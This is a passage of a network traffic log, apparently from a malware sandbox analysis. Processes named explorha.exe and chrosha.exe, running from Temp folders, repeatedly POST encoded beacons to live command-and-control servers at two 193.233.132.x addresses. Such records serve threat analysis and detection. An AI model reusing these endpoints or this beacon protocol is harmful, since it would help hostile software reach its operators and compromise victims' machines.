                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 38 0d 0a 20 3c 63 3e 33 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 8 <c>3<d>0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
332 | 192.168.2.5 | 50175 | 193.233.132.56 | 80 | 4484 | C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
Timestamp | Bytes transferred | Direction | Data
Apr 19, 2024 03:31:30.031157970 CEST | 312 | OUT | POST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6C7F0AF43CFF9FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
Apr 19, 2024 03:31:30.284478903 CEST | 196 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:31:30 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
333 | 192.168.2.5 | 50176 | 193.233.132.167 | 80 | 8024 | C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe
Timestamp | Bytes transferred | Direction | Data
Apr 19, 2024 03:31:30.382853031 CEST | 309 | OUT | POST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Ascii: r=9638D3415F778A1E31FFC1F4BF9132BB9E6254E2AD627B50D79BF0400CBB2BB81278509C05BEA3669A52777FA61354573FF4E6412A7465A1FF4900B2DEF3C0A0AA9BC22C8D1592455E7B5809AD
Apr 19, 2024 03:31:30.635801077 CEST | 196 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:31:30 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
334 | 192.168.2.5 | 50177 | 193.233.132.56 | 80 | 4484 | C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
Timestamp | Bytes transferred | Direction | Data
Apr 19, 2024 03:31:30.648199081 CEST | 158 | OUT | POST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
Apr 19, 2024 03:31:30.895912886 CEST | 219 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:31:30 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Refresh: 0; url = Login.php
                                                                                                                                                                                                                                      Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 1 0


Session ID  Source IP    Source Port  Destination IP   Destination Port  PID   Process
335         192.168.2.5  50178        193.233.132.167  80                8024  C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe
Timestamp  Bytes transferred  Direction  Data
Apr 19, 2024 03:31:30.997479916 CEST  155  OUT  POST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
Apr 19, 2024 03:31:31.245719910 CEST  197  IN  HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:31:31 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 38 0d 0a 20 3c 63 3e 33 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 8 <c>3<d>0


Session ID  Source IP    Source Port  Destination IP   Destination Port  PID   Process
336         192.168.2.5  50179        193.233.132.56   80                8152  C:\Program Files\Google\Chrome\Application\chrome.exe
Timestamp  Bytes transferred  Direction  Data
Apr 19, 2024 03:31:31.152559996 CEST  312  OUT  POST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6C7F0AF43CFF9FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
Apr 19, 2024 03:31:31.406743050 CEST  196  IN  HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:31:31 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


Session ID  Source IP    Source Port  Destination IP   Destination Port  PID   Process
337         192.168.2.5  50180        193.233.132.167  80                8024  C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe
Timestamp  Bytes transferred  Direction  Data
Apr 19, 2024 03:31:31.494344950 CEST  309  OUT  POST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Ascii: r=9638D3415F778A1E31FFC1F4BF9132BB9E6254E2AD627B50D79BF0400CBB2BB81278509C05BEA3669A52777FA61354573FF4E6412A7465A1FF4900B2DEF3C0A0AA9BC22C8D1592455E7B5809AD
Apr 19, 2024 03:31:31.742284060 CEST  196  IN  HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:31:31 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


Session ID  Source IP    Source Port  Destination IP   Destination Port  PID   Process
338         192.168.2.5  50181        193.233.132.56   80                4484  C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
Timestamp  Bytes transferred  Direction  Data
Apr 19, 2024 03:31:31.782877922 CEST  158  OUT  POST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
Apr 19, 2024 03:31:32.032886982 CEST  219  IN  HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:31:31 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Refresh: 0; url = Login.php
                                                                                                                                                                                                                                      Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 1 0


Session ID  Source IP    Source Port  Destination IP   Destination Port  PID   Process
339         192.168.2.5  50182        193.233.132.167  80                8024  C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe
Timestamp  Bytes transferred  Direction  Data
Apr 19, 2024 03:31:32.101059914 CEST  155  OUT  POST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
Apr 19, 2024 03:31:32.345674038 CEST  197  IN  HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:31:32 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 38 0d 0a 20 3c 63 3e 33 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 8 <c>3<d>0


Session ID  Source IP    Source Port  Destination IP   Destination Port  PID   Process
340         192.168.2.5  50183        193.233.132.56   80                4484  C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
Timestamp  Bytes transferred  Direction  Data
Apr 19, 2024 03:31:32.287570000 CEST  312  OUT  POST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6C7F0AF43CFF9FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
Apr 19, 2024 03:31:32.536350965 CEST  196  IN  HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:31:32 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


Session ID  Source IP    Source Port  Destination IP   Destination Port  PID   Process
341         192.168.2.5  50184        193.233.132.167  80                8024  C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe
Timestamp  Bytes transferred  Direction  Data
Apr 19, 2024 03:31:32.590403080 CEST  309  OUT  POST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Ascii: r=9638D3415F778A1E31FFC1F4BF9132BB9E6254E2AD627B50D79BF0400CBB2BB81278509C05BEA3669A52777FA61354573FF4E6412A7465A1FF4900B2DEF3C0A0AA9BC22C8D1592455E7B5809AD
Apr 19, 2024 03:31:32.836543083 CEST | 196 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:31:32 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
342 | 192.168.2.5 | 50185 | 193.233.132.56 | 80 | 4484 | C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
Timestamp | Bytes transferred | Direction | Data
Apr 19, 2024 03:31:32.896861076 CEST | 158 | OUT | POST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
Apr 19, 2024 03:31:33.138853073 CEST | 219 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:31:33 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Refresh: 0; url = Login.php
                                                                                                                                                                                                                                      Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 1 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
343 | 192.168.2.5 | 50186 | 193.233.132.167 | 80 | 8024 | C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe
Timestamp | Bytes transferred | Direction | Data
Apr 19, 2024 03:31:33.197447062 CEST | 155 | OUT | POST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
Apr 19, 2024 03:31:33.445358038 CEST | 197 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:31:33 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 38 0d 0a 20 3c 63 3e 33 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 8 <c>3<d>0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
344 | 192.168.2.5 | 50187 | 193.233.132.56 | 80 | 4484 | C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
Timestamp | Bytes transferred | Direction | Data
Apr 19, 2024 03:31:33.392600060 CEST | 312 | OUT | POST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6C7F0AF43CFF9FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
Apr 19, 2024 03:31:33.644563913 CEST | 196 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:31:33 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
345 | 192.168.2.5 | 50188 | 193.233.132.167 | 80 | 8024 | C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe
Timestamp | Bytes transferred | Direction | Data
Apr 19, 2024 03:31:33.695312023 CEST | 309 | OUT | POST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Ascii: r=9638D3415F778A1E31FFC1F4BF9132BB9E6254E2AD627B50D79BF0400CBB2BB81278509C05BEA3669A52777FA61354573FF4E6412A7465A1FF4900B2DEF3C0A0AA9BC22C8D1592455E7B5809AD
Apr 19, 2024 03:31:33.944595098 CEST | 196 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:31:33 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
346 | 192.168.2.5 | 50189 | 193.233.132.56 | 80 | 4484 | C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
Timestamp | Bytes transferred | Direction | Data
Apr 19, 2024 03:31:34.018827915 CEST | 158 | OUT | POST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
Apr 19, 2024 03:31:34.267389059 CEST | 219 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:31:34 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Refresh: 0; url = Login.php
                                                                                                                                                                                                                                      Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 1 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
347 | 192.168.2.5 | 50190 | 193.233.132.167 | 80 | 8024 | C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe
Timestamp | Bytes transferred | Direction | Data
Apr 19, 2024 03:31:34.299438000 CEST | 155 | OUT | POST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
Apr 19, 2024 03:31:34.544715881 CEST | 197 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:31:34 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 38 0d 0a 20 3c 63 3e 33 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 8 <c>3<d>0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
348 | 192.168.2.5 | 50191 | 193.233.132.56 | 80 | 4484 | C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
Timestamp | Bytes transferred | Direction | Data
Apr 19, 2024 03:31:34.521420002 CEST | 312 | OUT | POST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 43 32 33 38 43 41 39 46 30 42 45 32 35 41 42 41 35 46 39 45 36 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 30 41 46 34 33 43 46 46 39 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32
                                                                                                                                                                                                                                      Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6C7F0AF43CFF9FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
Apr 19, 2024 03:31:34.776989937 CEST | 196 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:31:34 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
349 | 192.168.2.5 | 50192 | 193.233.132.167 | 80 | 8024 | C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe
Timestamp | Bytes transferred | Direction | Data
Apr 19, 2024 03:31:34.788438082 CEST | 309 | OUT | POST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 39 36 33 38 44 33 34 31 35 46 37 37 38 41 31 45 33 31 46 46 43 31 46 34 42 46 39 31 33 32 42 42 39 45 36 32 35 34 45 32 41 44 36 32 37 42 35 30 44 37 39 42 46 30 34 30 30 43 42 42 32 42 42 38 31 32 37 38 35 30 39 43 30 35 42 45 41 33 36 36 39 41 35 32 37 37 37 46 41 36 31 33 35 34 35 37 33 46 46 34 45 36 34 31 32 41 37 34 36 35 41 31 46 46 34 39 30 30 42 32 44 45 46 33 43 30 41 30 41 41 39 42 43 32 32 43 38 44 31 35 39 32 34 35 35 45 37 42 35 38 30 39 41 44
                                                                                                                                                                                                                                      Data Ascii: r=9638D3415F778A1E31FFC1F4BF9132BB9E6254E2AD627B50D79BF0400CBB2BB81278509C05BEA3669A52777FA61354573FF4E6412A7465A1FF4900B2DEF3C0A0AA9BC22C8D1592455E7B5809AD
Apr 19, 2024 03:31:35.031517982 CEST | 196 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:31:34 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
350 | 192.168.2.5 | 50193 | 193.233.132.56 | 80 | 4484 | C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
Timestamp | Bytes transferred | Direction | Data
Apr 19, 2024 03:31:35.141568899 CEST | 158 | OUT | POST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
Apr 19, 2024 03:31:35.392831087 CEST | 219 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:31:35 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Refresh: 0; url = Login.php
                                                                                                                                                                                                                                      Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 1 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
351 | 192.168.2.5 | 50194 | 193.233.132.167 | 80 | 8024 | C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe
Timestamp | Bytes transferred | Direction | Data
Apr 19, 2024 03:31:35.386176109 CEST | 155 | OUT | POST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
Apr 19, 2024 03:31:35.629666090 CEST | 197 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:31:35 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 38 0d 0a 20 3c 63 3e 33 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 8 <c>3<d>0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
352 | 192.168.2.5 | 50195 | 193.233.132.56 | 80 | 4484 | C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
Timestamp | Bytes transferred | Direction | Data
Apr 19, 2024 03:31:35.715760946 CEST | 312 | OUT | POST /Pneh2sXQk0/index.php HTTP/1.1
